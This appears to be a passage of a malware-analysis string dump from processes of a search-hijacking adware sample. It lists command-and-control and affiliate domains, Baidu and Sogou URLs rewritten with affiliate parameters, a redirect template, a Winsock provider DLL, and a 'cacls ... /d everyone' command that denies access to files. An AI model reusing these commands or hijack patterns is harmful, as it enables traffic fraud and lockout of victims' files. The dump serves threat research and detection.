id:X</pre><pre>Send ReQueryLock ret:%d</pre><pre>Send QueryLock ret:%d</pre><pre>OnQueryLock %s Index:%d Hash:X</pre><pre>OnReplyLock m_TaskMutex[%d].Name=X Set Peer Info %d.%d.%d.%d:%d</pre><pre>OnReplyLock Set m_TaskMutex[%d].Name=X Status=MUTEX_STATUS_LOCK_FAILD</pre><pre>OnReplyLock m_TaskMutex[%d].Name=X Status:%d</pre><pre>OnLockOk m_TaskMutex[%d].Name=X Set Peer Info %d.%d.%d.%d:%d</pre><pre>OnReplyLockKeep Status:%d</pre><pre>OnDownOk m_TaskMutex[%d].Name=X Peer:%d.%d.%d.%d:%d</pre><pre>OnLockOver m_TaskMutex[%d].Name=X %s</pre><pre>m_TaskMutex[%d]->hDownThread=X</pre><pre>DownLoad(%d)</pre><pre>OnDownLoadOver Status:%d</pre><pre>Begin:X m_Item:X m_run:X m_End:X</pre><pre>FILE_TYPE_EXE cfg_idx:%d</pre><pre>FILE_TYPE_CFG bin_idx:%d</pre><pre>OnDownLoadModuleOver(X,%d) file_type:%d</pre><pre>index:%d time_out:%d down_time:M-d-d d:d:d</pre><pre>OnDownLoadCfgOver(X,%d)</pre><pre>cfg_md5: %s</pre><pre>cfg_url: %s</pre><pre>md5 : %s</pre><pre>url : %s</pre><pre>cfg_url</pre><pre>group:[%s]</pre><pre>idx:%d igroup:%d</pre><pre>Add Cfg Mutex:%s</pre><pre>Add Copy Cfg Mutex:%s</pre><pre>Add Bin Mutex:%s</pre><pre>Add Copy Bin Mutex:%s</pre><pre>Call End Fun:X ret:%d</pre><pre>NotInit:%d LockCount:%d NotRun:%d m_TaskMutex.size()=%d</pre><pre>NotInit:%d LockCount:%d NotRun:%d</pre><pre>zcÁ</pre><pre>%WinDir%\share\</pre><pre>58lm/temptation.bin</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\EXE_temp3.exe</pre><pre>GetCPInfo</pre><pre>RegCreateKeyExA</pre><pre>RegEnumKeyExA</pre><pre>RegCreateKeyA</pre><pre>RegOpenKeyA</pre><pre>RegCloseKey</pre><pre>UrlUnescapeA</pre><pre>InternetCrackUrlA</pre><pre>InternetCanonicalizeUrlA</pre><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>KERNEL32.DLL</pre><pre>iphlpapi.dll</pre><pre>PSAPI.DLL</pre><pre>SHELL32.dll</pre><pre>SHLWAPI.dll</pre><pre>USER32.dll</pre><pre>WININET.dll</pre><pre>WS2_32.dll</pre><pre>P2PDLL.dll</pre><pre>MSAFD Tcpip [TCP/IP]</pre><pre>MSAFD Tcpip [UDP/IP]</pre><pre>MSAFD 
Tcpip [RAW/IP]</pre><pre>RSVP UDP Service Provider</pre><pre>\Device\NetBT_Tcpip</pre><pre>RSVP TCP Service Provider</pre><pre>MSAFD NetBIOS [\Device\NetBT_Tcpip_{01593444-4DB3-4CEB-A054-D07FB68368D6}] SEQPACKET 0</pre><pre>MSAFD NetBIOS [\Device\NetBT_Tcpip_{01593444-4DB3-4CEB-A054-D07FB68368D6}] DATAGRAM 0</pre><pre>MSAFD NetBIOS [\Device\NetBT_Tcpip_{4CBD1967-6C39-4808-987E-2ACE8650DA25}] SEQPACKET 1</pre><pre>MSAFD NetBIOS [\Device\NetBT_Tcpip_{4CBD1967-6C39-4808-987E-2ACE8650DA25}] DATAGRAM 1</pre><pre>MSAFD NetBIOS [\Device\NetBT_Tcpip_{152A0A5A-25FD-438F-BF04-B180CF0B9BAD}] SEQPACKET 2</pre><pre>MSAFD NetBIOS [\Device\NetBT_Tcpip_{152A0A5A-25FD-438F-BF04-B180CF0B9BAD}] DATAGRAM 2</pre><pre>tv_w32.dll</pre><pre>indicdll.dll</pre><pre>mshtml.dll</pre><pre>shell32.dll</pre><pre>msctfime.ime</pre><pre>msctf.dll</pre><pre>uxtheme.dll</pre><pre>RegQueryValueExW %s</pre><pre>RegOpenKeyExW:%s</pre><pre>RegisterWindowMessageW:%s</pre><b>objs.exe_3332:</b><pre>E.LLPlD'*</pre><pre>__MSVCRT_HEAP_SELECT</pre><pre>user32.dll</pre><pre>inflate 1.2.3 Copyright 1995-2005 Mark Adler</pre><pre>OLEACC.dll</pre><pre>PSAPI.DLL</pre><pre>phlpapi.dll</pre><pre>127.0.0.1</pre><pre>msvcrt</pre><pre>1.2.3</pre><pre>User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)</pre><pre>bytes=%d-%d</pre><pre>bytes=%d-</pre><pre>HTTP/</pre><pre>HTTP/</pre><pre>http://get.woai310.com/getconfig/minisite.ini</pre><pre>Content-Type: 
application/x-www-form-urlencoded</pre><pre>http://</pre><pre>WebClientWindow</pre><pre>WebBrowserPointer</pre><pre>http://site.minimenhu.com/sh/index.html</pre><pre>%WinDir%\share\rsvp\objs.exe</pre><pre>GetProcessHeap</pre><pre>GetCPInfo</pre><pre>UrlUnescapeA</pre><pre>EnumChildWindows</pre><pre>EnumWindows</pre><pre>InternetCanonicalizeUrlA</pre><pre>InternetCrackUrlA</pre><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>O.qul5</pre><pre>KERNEL32.DLL</pre><pre>ole32.dll</pre><pre>OLEAUT32.dll</pre><pre>SHLWAPI.dll</pre><pre>USER32.dll</pre><pre>WININET.dll</pre><pre>WS2_32.dll</pre><b>EXE_temp3.exe_816_rwx_00401000_0008D000:</b><pre>__MSVCRT_HEAP_SELECT</pre><pre>user32.dll</pre><pre>USER32.dll</pre><pre>58lm/temptation.bin</pre><pre>.IUQT</pre><pre>[.aoH</pre><pre>[8~%xs</pre><pre> .oN7</pre><pre>z.Tl&</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\EXE_temp3.exe</pre><pre>GetProcessHeap</pre><pre>GetCPInfo</pre><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><b>EXE_temp3.exe_816_rwx_00DC0000_00053000:</b><pre>__MSVCRT_HEAP_SELECT</pre><pre>inflate 1.2.3 Copyright 1995-2005 Mark Adler</pre><pre>iexplore.exe</pre><pre>%Program Files%\Internet Explorer\iexplore.exe</pre><pre>explorer.exe</pre><pre>igfxsrvc.exe</pre><pre>{5D562E5F-741F-4b50-AB7B-7A997CEB9557}</pre><pre>{XXXX-XX-XX-XX-XXXXXX}</pre><pre>cacls.exe "%s" /e /d everyone</pre><pre>%Program Files%\E-yoo\EyooSechelper2.dll</pre><pre>http://</pre><pre>XXXXXXXXXXXXXXXX</pre><pre>Software\Microsoft\Windows\ShellNoRoam\TempCache</pre><pre>Software\Microsoft\Windows\ShellNoRoam\ShellCache</pre><pre>herollq.exe</pre><pre>WebPlayer2010.exe</pre><pre>VODPlayer.exe</pre><pre>JSKPBrowser.exe</pre><pre>ValeBrowser.exe</pre><pre>wmconfig.exe</pre><pre>NewBho.DLL</pre><pre>\ext\settings\{11f09afe-75ad-4e52-ab43-e09e9351ce17}</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\WCom Object</pre><pre>software\policies\microsoft\windows 
nt\dnsclient</pre><pre>ws2_32.dll</pre><pre>ole32.dll</pre><pre>ieui.dll</pre><pre>mshtml.dll</pre><pre>IEFrame.dll</pre><pre>iertutil.dll</pre><pre>User32.dll</pre><pre>SHLWAPI.dll</pre><pre>wininet.dll</pre><pre>urlmon.dll</pre><pre>mswsock.dll</pre><pre>ws2help.dll</pre><pre>RegOpenKeyExA</pre><pre>RegOpenKeyExW</pre><pre>NtQueryValueKey</pre><pre>NtOpenKey</pre><pre>ADVAPI32.dll</pre><pre>ntdll.dll</pre><pre>Kernel32.dll</pre><pre>dnsapi.dll</pre><pre>msvcrt</pre><pre>PubwinClient.exe</pre><pre>RunMe.exe</pre><pre>{11F09AFE-75AD-4E52-AB43-E09E9351CE17}</pre><pre>Shell.User\Group</pre><pre>oleaut32.dll</pre><pre>browseti.dll</pre><pre>hinthk.dll</pre><pre>zclm8.com</pre><pre>wq581.com</pre><pre>maimeng8.com</pre><pre>5sla.com</pre><pre>wb360.net</pre><pre>renren.com</pre><pre>jj123.com.cn</pre><pre>wb12318.com</pre><pre>iwb110.com</pre><pre>woai310.com</pre><pre>http://123.sogou.com</pre><pre>http://www.sogou.com/sogou</pre><pre>http://www.sogou.com/index</pre><pre>.info</pre><pre>http://baidu.com</pre><pre>{X-X-x-XX-XXXXXX}</pre><pre>www.soso.com</pre><pre>www.google.com</pre><pre>www.hao123.com</pre><pre>www.tao123.com</pre><pre>www.baidu.com</pre><pre>123.sogou.com</pre><pre>www.sogou.com</pre><pre>www.iwb110.com</pre><pre>rpcrt4.dll</pre><pre>kernel32.dll</pre><pre>{xxxx-xx-xx-xx-xxxxxx}</pre><pre>127.0.0.1</pre><pre>208.67.222.222</pre><pre>208.67.220.220</pre><pre>114.114.114.114</pre><pre>114.114.115.115</pre><pre>8.8.8.8</pre><pre>8.8.8.9</pre><pre>8.8.4.4</pre><pre>Shell.Dusn</pre><pre>1.2.3</pre><pre>User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; 
SV1)</pre><pre>bytes=%d-%d</pre><pre>bytes=%d-</pre><pre>HTTP/</pre><pre>HTTP/</pre><pre>ZwQueryValueKey</pre><pre>ZwOpenKey</pre><pre>SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}</pre><pre>xxxxxx</pre><pre>http://www.baidu.com/adrc.php?</pre><pre>http://www.baidu.com/baidu.php?</pre><pre>http://www.baidu.com/s?</pre><pre>http://www.hao123.com/?</pre><pre>http://123.sogou.com/?</pre><pre>http://www.sogou.com/img/fav.ico?</pre><pre>http://pv.sogou.com/pv.gif?</pre><pre>http://pb.sogou.com/pv.gif?</pre><pre>http://pb.sogou.com/cl.gif?</pre><pre>http://www.google.com/aclk?</pre><pre>http://www.sogou.com/bill_</pre><pre>http://www.sogou.com/sogou?</pre><pre>http://test.hermes.sogou.com/sa.gif?</pre><pre>http://www.sogou.com/index.htm</pre><pre>118.145.16.80</pre><pre>%SystemRoot%\System32\mswsock.dll</pre><pre>Tcpip</pre><pre>SupportedNameSpace</pre><pre>%SystemRoot%\System32\winrnr.dll</pre><pre>%SystemRoot%\system32\mswsock.dll</pre><pre>%SystemRoot%\system32\rsvpsp.dll</pre><pre>|%SystemRoot%\system32\rsvpsp.dll</pre><pre>000000000011</pre><pre>000000000010</pre><pre>000000000009</pre><pre>000000000008</pre><pre>000000000007</pre><pre>000000000006</pre><pre>000000000005</pre><pre>000000000004</pre><pre>000000000003</pre><pre>000000000002</pre><pre>000000000001</pre><pre>shdocvw.dll</pre><pre>ieframe.dll</pre><pre>http://www.sogou.com/sogou?query=</pre><pre>sogou-netb-xx-d</pre><pre>%%X</pre><pre>HttpAddRequestHeadersW</pre><pre>HttpAddRequestHeadersA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>HttpOpenRequestW</pre><pre>HttpOpenRequestA</pre><pre>HttpAddRequestHeaders</pre><pre>\StringFileInfo\xx\%s</pre><pre>user32.dll</pre><pre>6.0.2800.1106</pre><pre>6.00.2600.0000</pre><pre>6.00.2600.0000 (xpclient.010817-1148)</pre><pre>6.00.2737.800</pre><pre>6.00.2800.1106</pre><pre>6.00.2800.1106 
(xpsp1.020828-1920)</pre><pre>6.00.2800.1400</pre><pre>6.00.2800.1485</pre><pre>6.00.2800.1496</pre><pre>6.00.2800.1603</pre><pre>6.00.2800.1607</pre><pre>6.00.2800.1611</pre><pre>6.00.2800.1615</pre><pre>6.00.2800.1617</pre><pre>6.00.2800.1623</pre><pre>6.00.2800.1627</pre><pre>6.00.2800.1632</pre><pre>6.00.2800.1644</pre><pre>6.00.2800.1649</pre><pre>6.00.2800.1650</pre><pre>6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)</pre><pre>6.00.2900.2518 (xpsp.040919-1030)</pre><pre>6.00.2900.2518 (xpsp_sp2_gdr.040919-1056)</pre><pre>6.00.2900.2577 (xpsp_sp2_gdr.041130-1729)</pre><pre>6.00.2900.2598 (xpsp.041130-1728)</pre><pre>6.00.2900.2627 (xpsp.050309-1719)</pre><pre>6.00.2900.2627 (xpsp_sp2_gdr.050309-1648)</pre><pre>6.00.2900.2668 (xpsp.050430-1553)</pre><pre>6.00.2900.2668 (xpsp_sp2_gdr.050430-1553)</pre><pre>6.00.2900.2713 (xpsp.050702-1518)</pre><pre>6.00.2900.2713 (xpsp_sp2_gdr.050702-1513)</pre><pre>6.00.2900.2753 (xpsp.050902-1331)</pre><pre>6.00.2900.2781 (xpsp.051020-1728)</pre><pre>6.00.2900.2781 (xpsp_sp2_gdr.051020-1730)</pre><pre>6.00.2900.2823 (xpsp.060106-1527)</pre><pre>6.00.2900.2823 (xpsp_sp2_gdr.060106-1520)</pre><pre>6.00.2900.2861 (xpsp.060303-1528)</pre><pre>6.00.2900.2861 (xpsp_sp2_gdr.060303-1517)</pre><pre>6.00.2900.2904 (xpsp.060509-0230)</pre><pre>6.00.2900.2904 (xpsp_sp2_gdr.060509-0218)</pre><pre>6.00.2900.2937 (xpsp.060623-0011)</pre><pre>6.00.2900.2937 (xpsp_sp2_gdr.060623-0002)</pre><pre>6.00.2900.2995 (xpsp.060913-0019)</pre><pre>6.00.2900.2995 (xpsp_sp2_gdr.060913-0010)</pre><pre>6.00.2900.3020 (xpsp.061023-0222)</pre><pre>6.00.2900.3020 (xpsp_sp2_gdr.061023-0214)</pre><pre>6.00.2900.3059 (xpsp_sp2_gdr.070104-0050)</pre><pre>6.00.2900.3059 (xpsp_sp2_qfe.070104-0040)</pre><pre>6.00.2900.3086 (xpsp_sp2_gdr.070218-2314)</pre><pre>6.00.2900.3086 (xpsp_sp2_qfe.070218-2342)</pre><pre>6.00.2900.3121 (xpsp_sp2_gdr.070418-1302)</pre><pre>6.00.2900.3121 (xpsp_sp2_qfe.070418-1302)</pre><pre>6.00.2900.3164 
(xpsp_sp2_gdr.070626-1259)</pre><pre>6.00.2900.3164 (xpsp_sp2_qfe.070626-1258)</pre><pre>6.00.2900.3199 (xpsp_sp2_gdr.070821-1257)</pre><pre>6.00.2900.3199 (xpsp_sp2_qfe.070821-1250)</pre><pre>6.00.2900.3231 (xpsp_sp2_gdr.071010-1320)</pre><pre>6.00.2900.3231 (xpsp_sp2_qfe.071010-1316)</pre><pre>6.00.2900.3268 (xpsp_sp2_gdr.071206-1518)</pre><pre>6.00.2900.3268 (xpsp_sp2_qfe.071206-1251)</pre><pre>6.00.2900.3300 (xpsp.080125-2028)</pre><pre>6.00.2900.3314 (xpsp_sp2_gdr.080215-1241)</pre><pre>6.00.2900.3314 (xpsp_sp2_qfe.080215-1242)</pre><pre>6.00.2900.3354 (xpsp_sp2_gdr.080417-1412)</pre><pre>6.00.2900.3354 (xpsp_sp2_qfe.080417-1416)</pre><pre>6.00.2900.3395 (xpsp_sp2_gdr.080623-1307)</pre><pre>6.00.2900.3395 (xpsp_sp2_qfe.080623-1318)</pre><pre>6.00.2900.3429 (xpsp_sp2_gdr.080819-1231)</pre><pre>6.00.2900.3429 (xpsp_sp2_qfe.080819-1244)</pre><pre>6.00.2900.3462 (xpsp_sp2_gdr.081015-1244)</pre><pre>6.00.2900.3462 (xpsp_sp2_qfe.081015-1657)</pre><pre>6.00.2900.3527 (xpsp_sp2_gdr.090219-1253)</pre><pre>6.00.2900.3527 (xpsp_sp2_qfe.090219-1311)</pre><pre>6.00.2900.3562 (xpsp_sp2_gdr.090427-1232)</pre><pre>6.00.2900.3562 (xpsp_sp2_qfe.090427-1240)</pre><pre>6.00.2900.3592 (xpsp_sp2_gdr.090622-1453)</pre><pre>6.00.2900.3592 (xpsp_sp2_qfe.090622-1503)</pre><pre>6.00.2900.3627 (xpsp_sp2_gdr.090918-1238)</pre><pre>6.00.2900.3627 (xpsp_sp2_qfe.090918-1245)</pre><pre>6.00.2900.3640 (xpsp_sp2_gdr.091027-1355)</pre><pre>6.00.2900.3640 (xpsp_sp2_qfe.091027-1402)</pre><pre>6.00.2900.3660 (xpsp_sp2_gdr.091216-1517)</pre><pre>6.00.2900.3660 (xpsp_sp2_qfe.091216-1705)</pre><pre>6.00.2900.3676 (xpsp_sp2_gdr.100225-1250)</pre><pre>6.00.2900.3676 (xpsp_sp2_qfe.100225-1434)</pre><pre>6.00.2900.3698 (xpsp_sp2_gdr.100416-1705)</pre><pre>6.00.2900.3698 (xpsp_sp2_qfe.100416-1708)</pre><pre>6.00.2900.5512 (xpsp.080413-2105)</pre><pre>6.00.2900.5583 (xpsp_sp3_gdr.080417-1430)</pre><pre>6.00.2900.5583 (xpsp_sp3_qfe.080417-1431)</pre><pre>6.00.2900.5626 
(xpsp_sp3_gdr.080623-1315)</pre><pre>6.00.2900.5626 (xpsp_sp3_qfe.080623-1331)</pre><pre>6.00.2900.5659 (xpsp_sp3_gdr.080819-1237)</pre><pre>6.00.2900.5659 (xpsp_sp3_qfe.080819-1352)</pre><pre>6.00.2900.5694 (xpsp_sp3_gdr.081015-1312)</pre><pre>6.00.2900.5694 (xpsp_sp3_qfe.081015-1409)</pre><pre>6.00.2900.5764 (xpsp_sp3_gdr.090219-1240)</pre><pre>6.00.2900.5764 (xpsp_sp3_qfe.090219-1311)</pre><pre>6.00.2900.5803 (xpsp_sp3_gdr.090428-1325)</pre><pre>6.00.2900.5803 (xpsp_sp3_qfe.090428-1347)</pre><pre>6.00.2900.5835 (xpsp_sp3_gdr.090626-1535)</pre><pre>6.00.2900.5835 (xpsp_sp3_qfe.090626-1600)</pre><pre>6.00.2900.5880 (xpsp_sp3_gdr.090924-1438)</pre><pre>6.00.2900.5880 (xpsp_sp3_qfe.090924-1448)</pre><pre>6.00.2900.5897 (xpsp_sp3_gdr.091028-1650)</pre><pre>6.00.2900.5897 (xpsp_sp3_qfe.091028-1717)</pre><pre>6.00.2900.5921 (xpsp_sp3_gdr.091221-1718)</pre><pre>6.00.2900.5921 (xpsp_sp3_qfe.091221-1752)</pre><pre>6.00.2900.5945 (xpsp_sp3_gdr.100225-1251)</pre><pre>6.00.2900.5945 (xpsp_sp3_qfe.100225-1321)</pre><pre>6.00.2900.5969 (xpsp_sp3_gdr.100416-1716)</pre><pre>6.00.2900.5969 (xpsp_sp3_qfe.100416-1736)</pre><pre>6.00.2900.6003 (xpsp_sp3_gdr.100623-1635)</pre><pre>6.00.2900.6003 (xpsp_sp3_qfe.100623-1636)</pre><pre>6.00.2900.6036 (xpsp_sp3_gdr.100908-2023)</pre><pre>6.00.2900.6036 (xpsp_sp3_qfe.100908-2019)</pre><pre>6.00.2900.6049 (xpsp_sp3_gdr.101103-1638)</pre><pre>6.00.2900.6049 (xpsp_sp3_qfe.101103-1636)</pre><pre>6.00.2900.6058 (xpsp_sp3_gdr.101220-1709)</pre><pre>6.00.2900.6058 (xpsp_sp3_qfe.101220-1651)</pre><pre>6.00.2900.6082 (xpsp_sp3_gdr.110217-1622)</pre><pre>6.00.2900.6082 (xpsp_sp3_qfe.110217-1621)</pre><pre>6.00.2900.6104 (xpsp_sp3_gdr.110425-1624)</pre><pre>6.00.2900.6104 (xpsp_sp3_qfe.110425-1624)</pre><pre>6.00.2900.6126 (xpsp_sp3_gdr.110621-1627)</pre><pre>6.00.2900.6126 (xpsp_sp3_qfe.110621-1627)</pre><pre>6.00.2900.6148 (xpsp_sp3_gdr.110905-1615)</pre><pre>6.00.2900.6148 (xpsp_sp3_qfe.110905-1615)</pre><pre>6.00.2900.6168 
(xpsp_sp3_gdr.111101-1829)</pre><pre>6.00.2900.6168 (xpsp_sp3_qfe.111101-1828)</pre><pre>6.00.2900.6182 (xpsp_sp3_gdr.111216-1642)</pre><pre>6.00.2900.6182 (xpsp_sp3_qfe.111216-1630)</pre><pre>6.00.2900.6197 (xpsp_sp3_gdr.120228-1720)</pre><pre>6.00.2900.6197 (xpsp_sp3_qfe.120228-1721)</pre><pre>6.00.2900.6228 (xpsp_sp3_gdr.120515-1618)</pre><pre>6.00.2900.6228 (xpsp_sp3_qfe.120515-1618)</pre><pre>6.00.2900.6254 (xpsp_sp3_gdr.120628-1618)</pre><pre>6.00.2900.6254 (xpsp_sp3_qfe.120628-1619)</pre><pre>6.00.2900.6287 (xpsp_sp3_gdr.120828-1631)</pre><pre>6.00.2900.6287 (xpsp_sp3_qfe.120828-1626)</pre><pre>6.00.2900.6309 (xpsp_sp3_gdr.121031-1323)</pre><pre>6.00.2900.6309 (xpsp_sp3_qfe.121031-1323)</pre><pre>6.00.2900.6357 (xpsp_sp3_gdr.130221-0418)</pre><pre>6.00.3790.0 (srv03_rtm.030324-2048)</pre><pre>6.00.3790.118 (srv03_gdr.031205-1652)</pre><pre>6.00.3790.118 (srv03_qfe.031205-1652)</pre><pre>6.00.3790.1830 (srv03_sp1_rtm.050324-1447)</pre><pre>6.00.3790.186 (srv03_gdr.040410-1234)</pre><pre>6.00.3790.186 (srv03_qfe.040410-1236)</pre><pre>6.00.3790.2509 (srv03_sp1_gdr.050815-1517)</pre><pre>6.00.3790.2653 (srv03_sp1_gdr.060303-1536)</pre><pre>6.00.3790.2653 (srv03_sp1_qfe.060303-1552)</pre><pre>6.00.3790.2732 (srv03_sp1_gdr.060623-0310)</pre><pre>6.00.3790.2732 (srv03_sp1_qfe.060623-0318)</pre><pre>6.00.3790.2817 (srv03_sp1_gdr.061023-0100)</pre><pre>6.00.3790.2993 (srv03_sp1_gdr.070817-1316)</pre><pre>6.00.3790.2993 (srv03_sp1_qfe.070817-1316)</pre><pre>6.00.3790.3041 (srv03_sp1_gdr.071107-1901)</pre><pre>6.00.3790.3041 (srv03_sp1_qfe.071107-1901)</pre><pre>6.00.3790.3091 (srv03_sp1_gdr.080215-1206)</pre><pre>6.00.3790.3091 (srv03_sp1_qfe.080215-1206)</pre><pre>6.00.3790.3194 (srv03_sp1_gdr.080819-1207)</pre><pre>6.00.3790.3194 (srv03_sp1_qfe.080819-1207)</pre><pre>6.00.3790.3229 (srv03_sp1_gdr.081016-1620)</pre><pre>6.00.3790.3229 (srv03_sp1_qfe.081016-1620)</pre><pre>6.00.3790.3304 (srv03_sp1_gdr.090303-1204)</pre><pre>6.00.3790.3304 
(srv03_sp1_qfe.090303-1204)</pre><pre>6.00.3790.3959 (srv03_sp2_rtm.070216-1710)</pre><pre>6.00.3790.4186 (srv03_sp2_gdr.071108-1306)</pre><pre>6.00.3790.4186 (srv03_sp2_qfe.071108-1306)</pre><pre>6.00.3790.4210 (srv03_sp2_qfe.071221-1418)</pre><pre>6.00.3790.4237 (srv03_sp2_gdr.080215-1206)</pre><pre>6.00.3790.4237 (srv03_sp2_qfe.080215-1206)</pre><pre>6.00.3790.4275 (srv03_sp2_gdr.080417-1307)</pre><pre>6.00.3790.4275 (srv03_sp2_qfe.080417-1307)</pre><pre>6.00.3790.4324 (srv03_sp2_qfe.080630-1205)</pre><pre>6.00.3790.4357 (srv03_sp2_gdr.080819-1207)</pre><pre>6.00.3790.4357 (srv03_sp2_qfe.080819-1207)</pre><pre>6.00.3790.4392 (srv03_sp2_gdr.081016-1620)</pre><pre>6.00.3790.4392 (srv03_sp2_qfe.081016-1620)</pre><pre>6.00.3790.4470 (srv03_sp2_gdr.090303-1204)</pre><pre>6.00.3790.4470 (srv03_sp2_qfe.090303-1204)</pre><pre>6.00.3790.4504 (srv03_sp2_gdr.090428-1405)</pre><pre>6.00.3790.4504 (srv03_sp2_qfe.090428-1405)</pre><pre>6.00.3790.4539 (srv03_sp2_gdr.090626-1428)</pre><pre>6.00.3790.4539 (srv03_sp2_qfe.090626-1428)</pre><pre>6.00.3790.4589 (srv03_sp2_gdr.090914-1233)</pre><pre>6.00.3790.4589 (srv03_sp2_qfe.090914-1233)</pre><pre>6.00.3790.4672 (srv03_sp2_gdr.100225-1230)</pre><pre>6.00.3790.4672 (srv03_sp2_qfe.100225-1230)</pre><pre>6.00.3790.4696 (srv03_sp2_gdr.100419-1942)</pre><pre>6.00.3790.4732 (srv03_sp2_gdr.100623-0356)</pre><pre>6.00.3790.4732 (srv03_sp2_qfe.100623-0356)</pre><pre>6.00.3790.4772 (srv03_sp2_gdr.100908-1010)</pre><pre>6.00.3790.4772 (srv03_sp2_qfe.100908-1010)</pre><pre>6.00.3790.4795 (srv03_sp2_qfe.101103-0357)</pre><pre>6.00.3790.4807 (srv03_sp2_gdr.101220-0307)</pre><pre>6.00.3790.4807 (srv03_sp2_qfe.101220-0307)</pre><pre>6.00.3790.4835 (srv03_sp2_gdr.110222-0239)</pre><pre>6.00.3790.4835 (srv03_sp2_qfe.110222-0239)</pre><pre>6.00.3790.4857 (srv03_sp2_gdr.110425-0335)</pre><pre>6.00.3790.4857 (srv03_sp2_qfe.110425-0335)</pre><pre>6.00.3790.4879 (srv03_sp2_gdr.110621-0342)</pre><pre>6.00.3790.4879 
(srv03_sp2_qfe.110621-0342)</pre><pre>6.00.3790.4904 (srv03_sp2_gdr.110905-0334)</pre><pre>6.00.3790.4904 (srv03_sp2_qfe.110905-0334)</pre><pre>6.00.3790.4929 (srv03_sp2_gdr.111104-0342)</pre><pre>6.00.3790.4929 (srv03_sp2_qfe.111104-0342)</pre><pre>6.00.3790.4944 (srv03_sp2_gdr.111216-0308)</pre><pre>6.00.3790.4944 (srv03_sp2_qfe.111216-0308)</pre><pre>6.00.3790.4969 (srv03_sp2_gdr.120228-0234)</pre><pre>6.00.3790.4969 (srv03_sp2_qfe.120228-0234)</pre><pre>6.00.3790.5004 (srv03_sp2_gdr.120515-0336)</pre><pre>6.00.3790.5004 (srv03_sp2_qfe.120515-0336)</pre><pre>6.00.3790.5029 (srv03_sp2_gdr.120628-0335)</pre><pre>6.00.3790.5029 (srv03_sp2_qfe.120628-0335)</pre><pre>6.00.3790.5060 (srv03_sp2_gdr.120824-0334)</pre><pre>6.00.3790.5060 (srv03_sp2_qfe.120824-0334)</pre><pre>6.00.3790.5080 (srv03_sp2_gdr.121026-1534)</pre><pre>6.00.3790.5080 (srv03_sp2_qfe.121026-1534)</pre><pre>HTTP/1.</pre><pre>HTTP/1.1 302 Moved Temporarily</pre><pre>http://www.baidu.com/s? tn=</pre><pre>http://www.baidu.com/</pre><pre>http://www.sogou.com/sogou? pid=</pre><pre>http://www.sogou.com/index. 
pid=</pre><pre>http://rlt.inte.sogou.com/</pre><pre><html><head><meta http-equiv="refresh" content="0;url=</pre><pre>[i 1]){b.href=</pre><pre>[i]==b.id){if (b.href!=</pre><pre>.length;i =2){if (</pre><pre>&cmv=X</pre><pre>window.sogou_adclk</pre><pre>http://www.baidu.com/ tn=-wd=-word=</pre><pre>tn=%s</pre><pre>http://www.hao123.com/ tn=</pre><pre>.google.com</pre><pre>pv.sogou.com</pre><pre>pb.sogou.com</pre><pre>.tanghulu.cc</pre><pre>.zclm8.com</pre><pre>.wq581.com</pre><pre>.maimeng8.com</pre><pre>.5sla.com</pre><pre>.wb360.net</pre><pre>.renren.com</pre><pre>.jj123.com.cn</pre><pre>.iwb110.com</pre><pre>.wb12318.com</pre><pre>.woai310.com</pre><pre>.58lianmeng.com</pre><pre>dwVAOffset:X</pre><pre>.data</pre><pre>.text</pre><pre>FILE_EXECUTE</pre><pre>FILE_GENERIC_EXECUTE</pre><pre>GENERIC_EXECUTE</pre><pre>C:\DOCUME~1\" %CurrentUserName% /></head></html></pre><pre>" link="http://www.sogou.com/sogou?pid=%s&query=%%s" icon="207" /></pre><pre>param:%s</pre><pre>[%s],</pre><pre>call entry ret:%d</pre><pre>entry addr:X %s</pre><pre>%s addr:X %s</pre><pre>(%d).%s</pre><pre>run_rate :%d</pre><pre>ip_addr :%s</pre><pre>ngroup :%d</pre><pre>cfg_file :%s</pre><pre>bin_file :%s</pre><pre>root_path:%s</pre><pre>igroup :%d</pre><pre>ini :X</pre><pre>kvs :X</pre><pre>gkvs :X</pre><pre>user :%s</pre><pre>hWnd :X</pre><pre>%s%sX%s</pre><pre>CreateExeShortcut Save To:%s</pre><pre>CreateExeShortcut nIndex:%d</pre><pre>CreateExeShortcut pszArgs:%s</pre><pre>CreateExeShortcut pszExeFile:%s</pre><pre>CreateExeShortcut pszWorkerDir:%s</pre><pre>CreateExeShortcut pszDescription:%s</pre><pre>CreateExeShortcut QueryInterface IID_IPersistFile ok</pre><pre>CreateExeShortcut pLink:X</pre><pre>PostClientInfo_Thread:X</pre><pre>,bRet:%d 
StatusCode:%d</pre><pre>www.dskjkl.com</pre><pre>First_PostClientInfo_Thread:X</pre><pre>/sp/callnew.aspx?</pre><pre>www.58lianmeng.com</pre><pre>XXXXXXXXXXXXXXXX</pre><pre>ddddddd</pre><pre>010203040506</pre><pre>.text</pre><pre>`.bss</pre><pre>.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>KERNEL32.dll</pre><pre>.rsrc</pre><pre>.data</pre><pre>kernel32.dll</pre><pre>PEPack.dll</pre><pre>%s : X</pre><pre>More information: http://www.ibsensoftware.com/</pre><pre>3<3q3</pre><pre>GetProcAddress PackTheFile OK Addr:X</pre><pre>GetProcAddress SetFlags OK Addr:X</pre><pre>kind:X posguid:X</pre><pre>MSFT_TypeInfoBase Size:%d</pre><pre>MSFT_Header Size:X</pre><pre>bGetClsID:%d bGetIID:%d</pre><pre>GetClsIDAndIIDFromModuleHandle bRet:%d</pre><pre>TypeLib Res 